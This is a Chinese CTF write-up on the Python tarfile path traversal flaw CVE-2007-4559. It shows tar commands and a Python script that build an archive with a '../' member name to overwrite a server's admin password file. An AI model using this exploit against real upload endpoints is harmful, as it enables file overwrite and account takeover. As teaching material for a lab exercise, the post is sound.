当前位置: 首页 > article >正文

tar文件覆盖漏洞 CVE-2007-4559

文章目录

    • 前言
    • 原理
    • 例题 [NSSRound#7 Team]新的博客
      • 方法一 手搓文件名
      • 方法二 python脚本


前言

做到[NSSRound#6 Team]check(Revenge)时发现是tar文件覆盖,但是对概念和执行过程理解不够深就光光记住脚本,所以在做本题[NSSRound#7 Team]新的博客时打算重新梳理该漏洞执行过程

原理

Python 中 tarfile 模块中的extract、extractFile和extractall 函数中的目录遍历漏洞 允许 用户协助的远程攻击者通过 TAR 存档文件名中的…和/遍历目录 和 写入/覆盖任意文件

关键代码

tar = tarfile.open(file_save_path, "r")
tar.extractall(app.config['UPLOAD_FOLDER'])

extractall函数如果结合包含…/的文件名时可以实现文件覆盖漏洞

例题 [NSSRound#7 Team]新的博客

打开题目,发现有两个跳转的网页
第一个提示要用admin用户登录但是密码经过sha512加密,然后就是泄露了源码地址
在这里插入图片描述第二个网页提示hacker打不开,那么应该是要admin才行

我们把字符串解码一下
在这里插入图片描述得到源码文件夹,文件结构大概如下
在这里插入图片描述
当然此文件夹给了加密后的密码,但是也提示我们不用去爆破
这里我们先随便注册用户1试试,发现存在tar文件上传
在这里插入图片描述
提示也说了这个是恢复备份用的,那么思路就是tar文件覆盖

方法一 手搓文件名

我们已知userinfo.json存放着用户和加密的密码,那么我们可以尝试自己加密123456去覆盖admin原本的密码从而实现登录。加密脚本如下

import hashlib
import json

password='123456'
with open('userinfo.json','wb') as file:
    file.write(json.dumps({'admin':hashlib.sha512(password.encode('utf-8')).hexdigest()}).encode('utf-8'))

我们覆盖的路径为/app/conf/userinfo.json,但是我们发现要目录穿越

因为我们以用户1登录后,参考前文给的文件结构可知道需要被覆盖路径为1/../../app/conf/userinfo.json,也就是说我们创建的文件名为1/../../app/conf/userinfo.json。在linux下构建文件夹结构,然后将上述脚本生成的userinfo.json进行tar压缩

tar -czvf upload.tar.gz userinfo.json

然后我们在userData文件夹下,执行tar命令构造出覆盖路径的文件名

tar cPzvf upload.tar.gz 1/../../conf/userinfo.json

在这里插入图片描述

方法二 python脚本

import os, hashlib, json
 
username = '1' # 你注册时用的用户名,尽量别有奇怪的符号
admin_passwd = '123456' # 之后要使用admin账户登陆时的密码
 
os.makedirs('conf')
os.makedirs(os.sep.join([os.getcwd(), 'userData', username]))
with open(os.sep.join([os.getcwd(), 'conf', 'userinfo.json']), 'wb') as tFile:
    tFile.write(json.dumps({'admin': hashlib.sha512(admin_passwd.encode('utf-8')).hexdigest()}).encode('utf-8'))
userDataDir = os.sep.join([os.getcwd(), 'userData'])
os.system(f'cd "{userDataDir}" && tar cPzvf upload.tar.gz {username}/../../conf/userinfo.json')

然后我们登录用户1,上传生成的tar文件
然后退出,用密码123456登录即可得到flag
在这里插入图片描述


http://www.kler.cn/a/154784.html

相关文章:

  • Android 中的 Zygote 和 Copy-on-Write 机制详解
  • ADC输出码和输入电压转换关系
  • Linux服务器定时执行jar重启命令
  • PHP反序列化_3-漏洞利用
  • Spring Boot 中的全局异常处理器
  • MySQL Workbench导入数据比mysql命令行慢
  • 如何选择适合的光电传感器与 STM32 微控制器进行接口设计
  • 【数据库】数据库基于封锁机制的调度器,使冲突可串行化,保障事务和调度一致性
  • 【工作生活】汽车ECU开发内容简介
  • 3D模型材质编辑
  • 数据结构之哈希表
  • 口罩标准讲解及推荐
  • 实现将线性表分割为三个循环链表,每个循环链表表示的线性表中只含一类字符。
  • oops-framework框架 之 界面管理(三)
  • Docker容器间网络共享
  • 高新技术企业研发人员绩效考核存在的问题
  • 蓝桥杯第1037题子串分值和 C++ 字符串 逆向思维 巧解
  • [传智杯 #3 初赛] 课程报名
  • 淘宝/天猫商品详情API接口丨京东商品详情丨1688商品详情丨接口key密钥获取方式
  • WPF面试题高级篇
  • 神经网络 代价函数
  • JWT和Session的区别
  • VUE语法-(readonly的用法)将数据设置成只读模式
  • 组件化编程
  • 基于景区智慧灯杆、智能指路牌基础设施的景区建设应用
  • 6 Redis缓存设计与性能优化